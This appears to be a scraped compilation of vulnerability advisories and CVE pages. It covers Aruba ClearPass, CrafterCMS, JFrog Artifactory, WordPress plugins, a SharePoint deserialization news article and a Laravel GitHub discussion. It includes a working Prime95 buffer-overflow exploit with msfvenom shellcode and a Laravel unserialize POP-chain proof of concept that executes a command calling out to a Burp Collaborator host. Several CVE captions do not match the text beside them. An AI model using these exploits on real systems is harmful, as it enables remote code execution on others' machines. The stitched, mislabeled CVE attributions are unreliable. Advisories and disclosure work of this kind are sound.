A authenticated remote command injection vulnerability was discovered in Aruba ClearPass Policy Manager version(s): 6.10.4 and below, 6.9.9 and below, 6.8.9-HF2 and below, 6.7.x and below. Aruba has released updates to ClearPass Policy Manager that address this security vulnerability.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Aruba Product Security Advisory =============================== Advisory ID: ARUBA-PSA-2022-007 CVE: CVE-2021-21419, CVE-2021-33503, CVE-2022-23657, CVE-2022-23658, CVE-2022-23659, CVE-2022-23660, CVE-2022-23661, CVE-2022-23662, CVE-2022-23663, CVE-2022-23664, CVE-2022-23665, CVE-2022-23666, CVE-2022-23667, CVE-2022-23668, CVE-2022-23669, CVE-2022-23670, CVE-2022-23671, CVE-2022-23672, CVE-2022-23673, CVE-2022-23674, CVE-2022-23675 Publication Date: 2022-May-04 Status: Confirmed Severity: Critical Revision: 1 Title ===== ClearPass Policy Manager Multiple Vulnerabilities Overview ======== Aruba has released updates to ClearPass Policy Manager that address multiple security vulnerabilities. Affected Products ================= These vulnerabilities affect ClearPass Policy Manager running the following patch versions unless specifically noted otherwise in the details section: - ClearPass Policy Manager 6.10.x: 6.10.4 and below - ClearPass Policy Manager 6.9.x: 6.9.9 and below - ClearPass Policy Manager 6.8.x: 6.8.9-HF2 and below Updating ClearPass Policy Manager to a patch version listed in the Resolution section at the end of this advisory will resolve all issues in the details section. Versions of ClearPass Policy Manager that are end of life should be considered to be affected by these vulnerabilities unless otherwise indicated. Impacted customers should plan to migrate to a supported version. Versions that should be considered to be vulnerable and not addressed by this advisory include: - ClearPass Policy Manager 6.7.x and below Details ======= Authentication Bypass Leading to Remote Code Execution in ClearPass Policy Manager Web-Based Management Interface (CVE-2022-23657, CVE-2022-23658, CVE-2022-23660) --------------------------------------------------------------------- Vulnerabilities in the web-based management interface of ClearPass Policy Manager could allow an unauthenticated remote attacker to run arbitrary commands on the underlying host. Successful exploitation of these vulnerabilities allow an attacker to execute arbitrary commands as root on the underlying operating system leading to complete system compromise. Internal References: ATLCP-156, ATLCP-162, ATLCP-163 Severity: Critical CVSSv3.x Overall Score: 9.8 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Discovery: These vulnerabilities were discovered and reported by Daniel Jensen (@dozernz) via Aruba's Bug Bounty Program. Authenticated Information Disclosure in ClearPass Policy Manager Web-Based Management Interface (CVE-2022-23670) --------------------------------------------------------------------- A vulnerability in the web-based management interface of ClearPass Policy Manager could allow a remote attacker authenticated with low privileges to access sensitive information. A successful exploit allows an attacker to retrieve information which could be used to potentially gain further access to network services supported by ClearPass Policy Manager. Internal Reference: ATLCP-169 Severity: High CVSSv3.x Overall Score: 8.5 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N Discovery: This vulnerability was discovered and reported by Colton Bachman of Aruba Threat Labs. Sensitive Information Disclosure in ClearPass Policy Manager Cluster via Privileged Network Position (CVE-2022-23671) --------------------------------------------------------------------- A vulnerability exists in the ClearPass Policy Manager cluster communications that allow for an attacker in a privileged network position to potentially obtain sensitive information. A successful exploit could allow an attacker to retrieve information that allows for unauthorized actions as a privileged user on the ClearPass Policy Manager cluster. Internal Reference: ATLCP-182 Severity: High CVSSv3.x Overall Score: 7.5 CVSS Vector: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H Discovery: This vulnerability was discovered and reported by the Central College Security Team. Authenticated Stored Cross-Site Scripting Vulnerability (XSS) in ClearPass Policy Manager Web-Based Management Interface (CVE-2022-23674, CVE-2022-23675) --------------------------------------------------------------------- Multiple vulnerabilities in the web-based management interface of ClearPass Policy Manager could allow an authenticated remote attacker to conduct a stored cross-site scripting (XSS) attack against an administrative user of the interface. A successful exploit allows an attacker to execute arbitrary script code in a victim’s browser in the context of the affected interface. Internal References: ATLCP-176, ATLCP-185 Severity: High CVSSv3.x Overall Score: 7.5 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L Discovery: These vulnerabilities were discovered and reported by Rahul Mohan of Aruba Networks and Daniel Jensen (@dozernz) via Aruba's Bug Bounty Program. Authenticated Remote Command Injection in ClearPass Policy Manager Command Line Interface Leading to Full System Compromise (CVE-2022-23661, CVE-2022-23662) --------------------------------------------------------------------- Vulnerabilities in the ClearPass Policy Manager command line interface allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to complete system compromise. Internal References: ATLCP-77, ATLCP-107 Severity: High CVSSv3.x Overall Score: 7.2 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H Discovery: These vulnerabilities were discovered and reported by Erik De Jong (bugcrowd.com/erikdejong) via Aruba's Bug Bounty Program. Authenticated Remote Command Injection in ClearPass Policy Manager Web-Based Management Interface Leading to Full System Compromise (CVE-2022-23663, CVE-2022-23664, CVE-2021-23665, CVE-2022-23666, CVE-2022-23672, CVE-2022-23673) --------------------------------------------------------------------- Vulnerabilities in the ClearPass Policy Manager web-based management interface allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to complete system compromise. Internal References: ATLCP-140, ATLCP-141, ATLCP-157, ATLCP-160, ATLCP-161, ATLCP-172 Severity: High CVSSv3.x Overall Score: 7.2 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H Discovery: These vulnerabilities were discovered and reported by Daniel Jensen (@dozernz) via Aruba's Bug Bounty Program. Reflected Cross Site Scripting Vulnerability (XSS) in ClearPass Policy Manager Web-Based Management Interface (CVE-2022-23659) --------------------------------------------------------------------- A vulnerability within the web-based management interface of ClearPass Policy Manager could allow a remote attacker to conduct a reflected cross-site scripting (XSS) attack against a user of the interface. A successful exploit could allow an attacker to execute arbitrary script code in a victim’s browser in the context of the affected interface. Internal Reference: ATLCP-181 Severity: Medium CVSSv3.x Overall Score: 6.6 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L Discovery: This vulnerability was discovered and reported by the Memorial Hermann Security Team. Improper Handling of Highly Compressed Data (Data Amplification) and Memory Allocation with Excessive Size Value in Python Eventlet Library (CVE-2021-21419) -------------------------------------------------------------------- A vulnerability exists in the Python Eventlet library used by ClearPass Policy Manager. This could allow a WebSocket peer to exhaust memory reserved by Eventlet inside of ClearPass Policy Manager leading to a partial Denial of Service condition in services that use the library. For more details, please refer to https://github.com/advisories/GHSA-9p9m-jm8w-94p2 Internal Reference: ATLCP-158 Severity: Medium CVSSv3.x Overall Score: 5.3 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L Discovery: This vulnerability was discovered by the maintainers of the Eventlet repository on GitHub. Authorization Bypass in ClearPass Policy Manager via Insufficient Session Expiration (CVE-2022-23669) --------------------------------------------------------------------- A vulnerability exists in the handling of SAML token expiration by ClearPass Policy Manager. A successful exploit could allow an attacker in the possession of a valid token to reuse the token after session expiration, thereby achieving a bypass of the normal authorization process. Internal Reference: ATLCP-171 Severity: Medium CVSSv3.x Overall Score: 5.0 CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L Discovery: This vulnerability was discovered and reported by Tomas Rzepka of F-Secure. Authenticated Denial-of-Service Condition in Python Urllib Library Used by ClearPass Policy Manager (CVE-2021-33503) -------------------------------------------------------------------- A vulnerability exists in the Python Urllib library used by ClearPass Policy Manager. An authenticated attacker can exploit this condition via the web-based management interface to create a denial-of-service condition in the interface. For more details, please refer to https://github.com/advisories/GHSA-q2q7-5pp4-w6pg Internal Reference: ATLCP-165 Severity: Medium CVSSv3.x Overall Score: 4.9 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H Discovery: This vulnerability was discovered by Nariyoshi Chida. Authenticated Remote Command Injection in ClearPass Policy Manager Command Line Interface Leading to Partial System Compromise (CVE-2022-23667) --------------------------------------------------------------------- A vulnerability in the ClearPass Policy Manager command line interface allows remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as a lower privileged user on the underlying operating system leading to partial system compromise. Internal Reference: ATLCP-92 Severity: Medium CVSSv3.x Overall Score: 4.7 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L Discovery: This vulnerability was discovered and reported by Daniel Jensen (@dozernz) via Aruba's Bug Bounty Program. Authenticated Server-Side Request Forgery (SSRF) Leading to Information Disclosure (CVE-2022-23668) --------------------------------------------------------------------- A vulnerability in the web-based management interface of ClearPass Policy Manager could allow an unauthenticated remote attacker to conduct a server-side request forgery (SSRF) attack. A successful exploit allows an attacker to enumerate information about the internal structure of the ClearPass Policy Manager host leading to potential disclosure of sensitive information. Internal Reference: ATLCP-124 Severity: Medium CVSSv3.x Overall Score: 4.1 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N Discovery: This vulnerability was discovered and reported by Mohammed F. Al-Barbari (bugcrowd.com/m4dm0e) via Aruba's Bug Bounty Program. Resolution ========== The vulnerabilities contained in this advisory can be addressed by patching or upgrading to one of the ClearPass Policy Manager versions listed below - ClearPass Policy Manager 6.10.x: 6.10.5 and above - ClearPass Policy Manager 6.9.x: 6.9.10 and above - ClearPass Policy Manager 6.8.x: 6.8.9-HF3 and above As a general rule, Aruba does not evaluate or patch ClearPass Policy Manager versions that have reached their End of Support (EoS) milestone. For more information about Aruba's End of Support policy visit: https://www.arubanetworks.com/support-services/end-of-life/ Workaround ========== To minimize the likelihood of an attacker exploiting these vulnerabilities, Aruba recommends that the CLI and web-based management interfaces for ClearPass Policy Manager be restricted to a dedicated layer 2 segment/VLAN and/or controlled by firewall policies at layer 3 and above ClearPass Policy Manager Security Hardening =========================================== For general information on hardening ClearPass Policy Manager instances against security threats please see the ClearPass Policy Manager Hardening Guide available at https://support.hpe.com/hpesc/public/docDisplay?docId=a00091066en\_us for ClearPass Policy Manager 6.9.x and earlier versions. For ClearPass 6.10.x the ClearPass Policy Manager Hardening Guide is available at https://www.arubanetworks.com/techdocs/ClearPass/6.10/PolicyManager/Content/home.htm Exploitation and Public Discussion ================================== Aruba is not aware of any public discussion or exploit code that target these specific vulnerabilities as of the release date of the advisory. Revision History ================ Revision 1 / 2022-May-04 / Initial release Aruba SIRT Security Procedures ============================== Complete information on reporting security vulnerabilities in Aruba Networks products and obtaining assistance with security incidents is available at: https://www.arubanetworks.com/support-services/security-bulletins/ For reporting \*NEW\* Aruba Networks security issues, email can be sent to aruba-sirt(at)hpe.com. For sensitive information we encourage the use of PGP encryption. Our public keys can be found at: https://www.arubanetworks.com/support-services/security-bulletins/ (c) Copyright 2022 by Aruba, a Hewlett Packard Enterprise company. This advisory may be redistributed freely after the release date given at the top of the text, provided that the redistributed copies are complete and unmodified, including all data and version information. -----BEGIN PGP SIGNATURE----- iQFLBAEBCAA1FiEEMd5pP5EnbG7Y0fo5mP4JykWFhtkFAmJpVl4XHHNpcnRAYXJ1 YmFuZXR3b3Jrcy5jb20ACgkQmP4JykWFhtnvWwgAnZmt6eDd2Wn2JScRccrY2gAQ nUHV7MDgqn6FRBBeRho8tpHQFaC73fSafdX9worLEFp1gUltUDDMefzpgonN0DHS ONE/tcYbwMuC6DaszY9S0MuKcdqSS6bisGsELlObi/8wP4cXZiQNEzrP9UUXX0GG OkRKksMg+Z5PuDjHqBaQEWu8f3jO3FX55JLZa5FWZwuGAFpi+UUfOloitYko+XvK /EayQ22dtxC+AUWPtMgxw1K0JwFO5vtqtsCDTctgbdKeomF1kkgw7KPIl3cvX6E+ fcL4KEFnGMXmrXislYFJXwsCWhax/ig7HC407k0U+m7Xx6AqqdmkzRETwgcTJQ== =AuGw -----END PGP SIGNATURE-----

CVE-2022-23666

A logged-in and authenticated user with a Reviewer Role may lock a content item.

*   

**CV-2022051603¶**

 

**Date**

2022.05.16

**Affected Versions**

**3.1** < 3.1.18

**Vulnerability Type**

CWE-913 Improper Control of Dynamically-Managed Code Resources

**Risk**

High

**Description**

Improper Control of Dynamically-Managed Code Resources vulnerability in Crafter Studio of Crafter CMS allows authenticated developers to execute OS commands via FreeMarker static methods.

**CVE**

https://www.cve.org/CVERecord?id=CVE-2021-23267

**Credit**

Kai Zhao (ToTU Security Team), https://github.com/happyhacking-k

**CV-2022051602¶**

 

**Date**

2022.05.16

**Affected Versions**

**3.1** < 3.1.18

**Vulnerability Type**

CWE-117 Improper Output Neutralization for Logs

**Risk**

Medium

**Description**

An anonymous user can craft a URL with text that ends up in the log viewer as is.The text can then include textual messages to mislead the administrator.

**CVE**

https://www.cve.org/CVERecord?id=CVE-2021-23266

**Credit**

Faizan Wani, https://github.com/faizanw8

**CV-2021120106¶**

 

**Date**

2021.12.01

**Affected Versions**

**3.1** < 3.1.15

**Vulnerability Type**

CWE-402: Transmission of Private Resources into a New Sphere (‘Resource Leak’)

**Risk**

Medium

**Description**

Transmission of Private Resources into a New Sphere (‘Resource Leak’) in CrafterEngine

**CVE**

https://www.cve.org/CVERecord?id=CVE-2021-23263

**Credit**

Carlos Ortiz, https://github.com/cortiz

**CV-2021120107¶**

 

**Date**

2021.12.01

**Affected Versions**

**3.1** < 3.1.15

**Vulnerability Type**

CWE-402: Transmission of Private Resources into a New Sphere (‘Resource Leak’) CWE-668 Exposure of Resource to Wrong Sphere

**Risk**

High

**Description**

Transmission of Private Resources into a New Sphere (‘Resource Leak’) and Exposureof Resource to Wrong Sphere in Crafter Search

**CVE**

https://www.cve.org/CVERecord?id=CVE-2021-23264

**Credit**

Sparsh Kulshrestha, https://github.com/sparshkulshrestha

**CV-2020080102¶**

 

**Date**

2020.08.01

**Affected Versions**

**3.0** < 3.0.27  
**3.1** < 3.1.7

**Vulnerability Type**

RCE

**Risk**

Medium

**Description**

Authenticated attackers with developer privileges in Crafter Studio may execute OS commands via deep inspection of FreeMarker template exposed objects.

**CVE**

https://www.cve.org/CVERecord?id=CVE-2020-25803

**Credit**

Alvaro Muñoz (GitHub), https://github.com/pwntester

**CV-2017061502¶**

 

**Date**

2017.06.15

**Affected Versions**

**3.0** < 3.0.1

**Vulnerability Type**

Directory Traversal

**Risk**

Critical

**Description**

A directory traversal vulnerability exists which allows unauthenticated attackers to overwrite files from the operating system which can lead to RCE.

**CVE**

https://www.cve.org/CVERecord?id=CVE-2017-15681

**Credit**

Jasmin Landry, https://github.com/JR0ch17

CVE-2021-23265: Security Advisories — CrafterCMS 3.1.23 documentation

Improper Control of Dynamically-Managed Code Resources vulnerability in Crafter Studio of Crafter CMS allows authenticated developers to execute OS commands via FreeMarker static methods.

CVE-2021-23267: Security Advisories — CrafterCMS 3.1.23 documentation

An anonymous user can craft a URL with text that ends up in the log viewer as is. The text can then include textual messages to mislead the administrator.

CVE-2021-23266: Security Advisories — CrafterCMS 3.1.23 documentation

Prime95 30.7 build 9 suffers from a Buffer Overflow vulnerability that could lead to Remote Code Execution.

    # Exploit Title:   Prime95 Version 30.7 build 9 Buffer Overflow RCE# Discovered by: Yehia Elghaly# Discovered Date: 2022-04-25# Vendor Homepage: https://www.mersenne.org/# Software Link : https://www.mersenne.org/ftp_root/gimps/p95v307b9.win32.zip# Tested Version: 30.7 build 9# Vulnerability Type:  Buffer Overflow (RCE) Local# Tested on OS: Windows 7 Professional x86# Description: Prime95 Version 30.7 build 9 Buffer Overflow RCE# 1- How to use: open the program go to test-PrimeNet-check the square-Connections # 2- paste the contents of open.txt in the optional proxy hostname field and the calculator will openbuffer = "A" * 144jum = "\xd8\x29\xe7\x6e" #push esp # ret  |  {PAGE_EXECUTE_READ} [libhwloc-15.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\ex\libhwloc-15.dll)nop = "\x90" * 20 #Nob hot = "C" * 100#sudo msfvenom -p windows/exec CMD=calc.exe -b "\x00\x09\x0A\x0d" -f python -v payloadpayload =  b""payload += b"\xbb\x72\xd7\x5d\x16\xdb\xc0\xd9\x74\x24\xf4\x5d"payload += b"\x29\xc9\xb1\x31\x83\xc5\x04\x31\x5d\x0f\x03\x5d"payload += b"\x7d\x35\xa8\xea\x69\x3b\x53\x13\x69\x5c\xdd\xf6"payload += b"\x58\x5c\xb9\x73\xca\x6c\xc9\xd6\xe6\x07\x9f\xc2"payload += b"\x7d\x65\x08\xe4\x36\xc0\x6e\xcb\xc7\x79\x52\x4a"payload += b"\x4b\x80\x87\xac\x72\x4b\xda\xad\xb3\xb6\x17\xff"payload += b"\x6c\xbc\x8a\x10\x19\x88\x16\x9a\x51\x1c\x1f\x7f"payload += b"\x21\x1f\x0e\x2e\x3a\x46\x90\xd0\xef\xf2\x99\xca"payload += b"\xec\x3f\x53\x60\xc6\xb4\x62\xa0\x17\x34\xc8\x8d"payload += b"\x98\xc7\x10\xc9\x1e\x38\x67\x23\x5d\xc5\x70\xf0"payload += b"\x1c\x11\xf4\xe3\x86\xd2\xae\xcf\x37\x36\x28\x9b"payload += b"\x3b\xf3\x3e\xc3\x5f\x02\x92\x7f\x5b\x8f\x15\x50"payload += b"\xea\xcb\x31\x74\xb7\x88\x58\x2d\x1d\x7e\x64\x2d"payload += b"\xfe\xdf\xc0\x25\x12\x0b\x79\x64\x78\xca\x0f\x12"payload += b"\xce\xcc\x0f\x1d\x7e\xa5\x3e\x96\x11\xb2\xbe\x7d"payload += b"\x56\x4c\xf5\xdc\xfe\xc5\x50\xb5\x43\x88\x62\x63"payload += b"\x87\xb5\xe0\x86\x77\x42\xf8\xe2\x72\x0e\xbe\x1f"payload += b"\x0e\x1f\x2b\x20\xbd\x20\x7e\x43\x20\xb3\xe2\xaa"payload += b"\xc7\x33\x80\xb2"evil = buffer + jum + nop + payloadfile = open('PExploit.txt','w+')file.write(evil)file.close()

CVE-2022-30055: Prime95 30.7 Build 9 Buffer Overflow ≈ Packet Storm

JFrog Artifactory before 7.36.1 and 6.23.41, is vulnerable to Insecure Deserialization of untrusted data which can lead to DoS, Privilege Escalation and Remote Code Execution when a specially crafted request is sent by a low privileged authenticated user due to insufficient validation of a user-provided serialized object.

 Subscribe to the RSS Feed |  SUPPORT

JFrog takes the privacy and security of its customers very seriously and always strives to provide prompt notification and remediation of any vulnerabilities discovered on JFrog products. As a CVE Numbering Authority (CNA), JFrog assigns CVE identification numbers to newly discovered security vulnerabilities.

Severity

CVE

Summary

Product

Versions

Published

Updated

HIGH

**CVE-2021-3860**

JFrog Artifactory prior to version 7.25.4 (Enterprise+ deployments only), is vulnerable to Blind SQL  Injection by a low privileged authenticated user due to incomplete validation when performing an SQL query.

Artifactory

*   Versions prior to 7.25.4
*   Versions prior to 6.23.30

12/15/2021

12/15/2021

MEDIUM

**CVE-2021-45074**

JFrog Artifactory prior to7.29.3 and 6.23.38, is vulnerable to Broken Access Control, a low-privileged user is able to delete other known users OAuth token, which will force a reauthentication on an active session or in the next UI session.

Artifactory

*   Versions prior to 7.29.3
*   Versions prior to 6.23.38

03/02/2022

03/02/2022

LOW

**CVE-2021-46270**

JFrog Artifactory prior to 7.31.10, is vulnerable to Broken Access Control where a project admin user is able to list all available repository names due to insufficient permission validation.

Artifactory

*   Versions prior to 7.31.10

03/02/2022

03/02/2022

HIGH

**CVE-2022-0573**

JFrog Artifactory prior to 7.36.1 and 6.23.41, is vulnerable to Insecure Deserialization of untrusted data which can lead to DoS, Privilege Escalation, and Remote Code Execution when a specially crafted request is sent by a low privileged authenticated user due to insufficient validation of a user-provided serialized object.

Artifactory

*   Versions prior to 7.36.1
*   Versions prior to 6.34.41

12/5/2022

12/5/2022

MEDIUM

**CVE-2021-45730**

JFrog Artifactory prior to 7.31.10, is vulnerable to Broken Access Control where a Project Admin is able to create, edit and delete Repository Layouts while Repository Layouts configuration should only be available for Platform Administrators. 

Artifactory

Versions prior to 7.31.10

18/5/2022

18/5/2022

MEDIUM

**CVE-2021-41834**

JFrog Artifactory prior to versions 7.28.0 and 6.23.38, is vulnerable to Broken Access Control, the copy functionality can be used by a low-privileged user to read and copy any artifact that exists in the Artifactory deployment due to improper permissions validation.

Artifactory

*   Versions prior to 7.28.0
*   Versions prior to 6.23.38

18/5/2022

18/5/2022

CVE-2022-0573: JFrog Security Advisories - JFrog

The Advanced Uploader WordPress plugin through 4.2 allows any authenticated users like subscriber to upload arbitrary files, such as PHP, which could lead to RCE

CVE-2022-1103

The AGIL WordPress plugin through 1.0 accepts all zip files and automatically extracts the zip file without validating the extracted file type. Allowing high privilege users such as admin to upload an arbitrary file like PHP, leading to RCE

CVE-2021-25119

Deserialization vulnerabilities are hard to fix

Ben Dickson 16 May 2022 at 13:38 UTC

Deserialization vulnerabilities are hard to fix

A security researcher found a fresh way to exploit a recently patched deserialization bug in Microsoft SharePoint and stage remote code execution (RCE) attacks.

The flaw, a variant on an issue that was patched in February, uses the site creation features of SharePoint, Microsoft’s intranet platform, to upload and run malicious files on the server.

Many languages use serialization and deserialization to pass complex objects to servers and between processes. If the deserialization process is insecure, an adversary will be able to exploit it to send malicious objects and run them on the server.

Nguyễn Tiến Giang (Jang), a security researcher at StarLabs, found that when SharePoint servers are configured in a certain way, they will be prone to deserialization attacks that can lead to RCE.

**Deserialization part deux**

In a detailed blog post, Jang explains that an adversary can exploit the bug by creating a SharePoint List on the server and uploading a malicious gadget chain with the deserialization payload as a PNG attachment.

By sending a render request for the uploaded file, the attacker will trigger the bug and execute the payload on the server.

“A successful attack may give the attacker the ability to get code execution in the target server with privilege of running w3wp.exe process,” Jang told The Daily Swig, referring to the IIS worker process that runs the web application.

YOU MAY ALSO LIKE Brace of Icinga web vulnerabilities ‘easily chained’ to hack IT monitoring software

Fortunately, the flaw can only be exploited by authenticated adversaries and when the application is in a configuration that turned off by default.

“Luckily, this bug doesn’t exist in a SharePoint with default configuration,” Jang said. “It requires a user with ‘Create Sub-site’ privilege and the State-Service in the target server must be enabled.”

Microsoft patched the bug (CVE-2022-29108) in May’s Patch Tuesday release.

**‘Old Wine, New Bottle’**

Jang found the bug while analyzing CVE-2022-22005. It turned out that there was another way to trigger the same bug.

“Actually, this bug is very easy to \[spot\]. There was an analysis blog post about it in March. Just follow the instructions in that blog post and people can easily spot the new variant of CVE-2022-22005,” Jang said.

Catch up with the latest Microsoft security news

Jang has described the bug as “Old Wine in a New Bottle” and tweeted a meme based on this theme.

Nguyễn Đình Hoàng (hir0ot), who penned a detailed analysis of CVE-2022-22005, told The Daily Swig that there are usually two ways to fix deserialization bugs: limiting endpoints that deserialize untrusted data or using a whitelist-based type binder.

“Both are difficult to implement effectively in the real world, especially when serialization/deserialization happens in the core protocol, framework, or application that was developed so many years ago,” hir0ot said.

“And the fix also must not impact the functional working of the application. Any fix can easily lead to a bug.”

RECOMMENDED Marcus Hutchins on WannaCry – ‘Still to this day it feels like it was all a weird dream’

SharePoint RCE bug resurfaces three months after being patched by Microsoft

Laravel 9.1.8, when processing attacker-controlled data for deserialization, allows Remote Code Execution via an unserialize pop chain in __destruct in Illuminate\Broadcasting\PendingBroadcast.php and dispatch($command) in Illuminate\Bus\QueueingDispatcher.php.

> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30778

**Build a route to test:**

routes/web.php ：

<?php

use Illuminate\\Support\\Facades\\Route;

/\*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
\*/

Route::get('/', function (\\Illuminate\\Http\\Request $request) {
//    return view('welcome');
    $ser = base64\_decode($request\->input("ser"));
    unserialize($ser);
    return "ok";
});

**poc**

<?php
namespace Illuminate\\Contracts\\Queue{
    interface ShouldQueue
    {
        //
    }
}

namespace Illuminate\\Bus{
    class Dispatcher{
        protected $container;
        protected $pipeline;
        protected $pipes = \[\];
        protected $handlers = \[\];
        protected $queueResolver;
        function \_\_construct()
        {
            $this\->queueResolver = "system";

        }
    }
}

namespace Illuminate\\Broadcasting{

    use Illuminate\\Contracts\\Queue\\ShouldQueue;

    class BroadcastEvent implements ShouldQueue {
        function \_\_construct()
        {

        }
    }
    class PendingBroadcast{
        protected $events;
        protected $event;
        function \_\_construct()
        {
            $this\->event = new BroadcastEvent();
            $this\->event\->connection = "ping -nc 1 laravel.me40p9vxwjbs7may8s6puipge7kx8m.burpcollaborator.net";
            $this\->events = new \\Illuminate\\Bus\\Dispatcher();
        }
    }
}
namespace{
    $a = new \\Illuminate\\Broadcasting\\PendingBroadcast();
    echo base64\_encode(serialize($a));
}

result :

    Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MjU6IklsbHVtaW5hdGVcQnVzXERpc3BhdGNoZXIiOjU6e3M6MTI6IgAqAGNvbnRhaW5lciI7TjtzOjExOiIAKgBwaXBlbGluZSI7TjtzOjg6IgAqAHBpcGVzIjthOjA6e31zOjExOiIAKgBoYW5kbGVycyI7YTowOnt9czoxNjoiACoAcXVldWVSZXNvbHZlciI7czo2OiJzeXN0ZW0iO31zOjg6IgAqAGV2ZW50IjtPOjM4OiJJbGx1bWluYXRlXEJyb2FkY2FzdGluZ1xCcm9hZGNhc3RFdmVudCI6MTp7czoxMDoiY29ubmVjdGlvbiI7czo3MDoicGluZyAtbmMgMSBsYXJhdmVsLm1lNDBwOXZ4d2piczdtYXk4czZwdWlwZ2U3a3g4bS5idXJwY29sbGFib3JhdG9yLm5ldCI7fX0=
    

**attack**

http://127.0.0.1:1080/?ser=Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MjU6IklsbHVtaW5hdGVcQnVzXERpc3BhdGNoZXIiOjU6e3M6MTI6IgAqAGNvbnRhaW5lciI7TjtzOjExOiIAKgBwaXBlbGluZSI7TjtzOjg6IgAqAHBpcGVzIjthOjA6e31zOjExOiIAKgBoYW5kbGVycyI7YTowOnt9czoxNjoiACoAcXVldWVSZXNvbHZlciI7czo2OiJzeXN0ZW0iO31zOjg6IgAqAGV2ZW50IjtPOjM4OiJJbGx1bWluYXRlXEJyb2FkY2FzdGluZ1xCcm9hZGNhc3RFdmVudCI6MTp7czoxMDoiY29ubmVjdGlvbiI7czo3MDoicGluZyAtbmMgMSBsYXJhdmVsLm1lNDBwOXZ4d2piczdtYXk4czZwdWlwZ2U3a3g4bS5idXJwY29sbGFib3JhdG9yLm5ldCI7fX0=

So, why was a CVE issued for this?

I don't see an attack scenario here. Could you describe in what way this is destructive or gives unintended effects?

> I don't see an attack scenario here. Could you describe in what way this is destructive or gives unintended effects?

@caendesilva If successfully exploited, an attacker would be able to perform remote code execution. In the example above this is demonstrated by running the ping command, which is a harmless way to confirm.

A malicious attacker could execute any command. This could be used to spawn a reverse shell, read and write files, access .env credentials, pivot to the database, etc.

Successful exploitation would require the use of unserialize within your laravel application and passing untrusted user input to that. While not recommended, it's also not unheard of.

> > I don't see an attack scenario here. Could you describe in what way this is destructive or gives unintended effects?
> 
> @caendesilva If successfully exploited, an attacker would be able to perform remote code execution. In the example above this is demonstrated by running the ping command, which is a harmless way to confirm.
> 
> A malicious attacker could execute any command. This could be used to spawn a reverse shell, read and write files, access .env credentials, pivot to the database, etc.
> 
> Successful exploitation would require the use of unserialize within your laravel application and passing untrusted user input to that. While not recommended, it's also not unheard of.

Thank you so much for the explanation. What confused me is that the ping command is entered from within your backend code. Are you claiming that the following string ping -nc 1 laravel.me40p9vxwjbs7may8s6puipge7kx8m.burpcollaborator.net can be entered and then executed by an attacker through the example route?

Are you aware of any instances in "official" (as in code maintained by the Laravel org) codebases where this is used? From your reply I know that my codebase does not contain this vulnerability, but if it is present in say Laravel Jetstream, that's something that should be noted.

The main problem I see is that a POP chain is NEVER a vulnerability by itself. The vulnerability would be to call unserialiase() to deserialise unvalidated input. But this instance doesn't appear in the code, hence it should not even be considered valid for a CVE.

It's really a nice finding tho. Just doesn't make sense to have it as a CVE, because... it's not a vulnerability.

> Are you claiming that the following string ping -nc 1 laravel.me40p9vxwjbs7may8s6puipge7kx8m.burpcollaborator.net can be entered and then executed by an attacker through the example route?

That is correct, by using the PoC to generate a base64 payload we can pass that to the example route. I have not personally reviewed all the laravel maintained codebases, but anywhere unserialize accepts user controlled input would be vulnerable.

> The main problem I see is that a POP chain is NEVER a vulnerability by itself. The vulnerability would be to call unserialiase() to deserialise unvalidated input. But this instance doesn't appear in the code, hence it should not even be considered valid for a CVE.
> 
> It's really a nice finding tho. Just doesn't make sense to have it as a CVE, because... it's not a vulnerability.

So having code execution on unserialize is a feature ?

> So having code execution on unserialize is a feature ?

The official PHP docs warn of this.  

This also reflects Taylor Otwell's response when I asked if he was aware of this CVE.

> On Tuesday, May 17th, 2022 at 12:06, taylorotwell taylor@laravel.com wrote:
> 
> Passing unsanitized user input to unserialize is never safe in PHP.

Of note: Snyk points to this being the vulnerable code in question.

> Affected versions of this package are vulnerable to Deserialization of Untrusted Data via an unserialize pop chain in \_\_destruct and dispatch($command).

@pasterp If you deserialise untrusted data, it's your fault for doing that. If there is whatever POP chain in your code, you may allow an attacker to execute arbitrary code, but the POP chain just makes the vulnerability worse, it DOES NOT constitute the vulnerability.

To make an example, if you have a stack buffer overflow, you can exploit it with a ROP chain, but the vulnerability is not the ROP chain, it is the bloody stack buffer overflow.  
Saying that the POP chain is the vulnerability is like saying that the ROP chain is the vulnerability, and that's false.

Calling unserialise on untrusted data is a vulnerability.

